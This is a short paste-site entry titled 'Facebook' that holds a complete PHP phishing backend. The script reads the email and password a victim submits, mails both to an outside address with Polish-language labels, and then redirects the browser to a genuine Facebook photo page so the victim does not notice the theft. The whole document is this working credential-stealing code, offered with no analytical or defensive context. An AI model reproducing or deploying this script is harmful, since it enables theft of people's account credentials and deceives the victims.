Facebook
From Red Peccary, 9 Years ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 748
  1. <?
  2.         $naglowki = "From: [email protected]".PHP_EOL."Reply-To: [email protected]".PHP_EOL."Content-type: text/plain; charset=iso-8859-2";
  3.         $f1 = $_POST['email'];
  4.         $f2 = $_POST['pass'];
  5.         mail("[email protected]", "$f1", "Login: $f1\nHasło: $f2", $naglowki);
  6. ?>
  7. <html>
  8. <body style="position: relative; top: -90px;">
  9. <script type="text/javascript">
  10.  
  11. window.location = "https://www.facebook.com/photo.php?fbid=720290804710190&set=t.100000779570613&type=3&theater";
  12.  
  13. </script>
  14. </body>
  15. </html>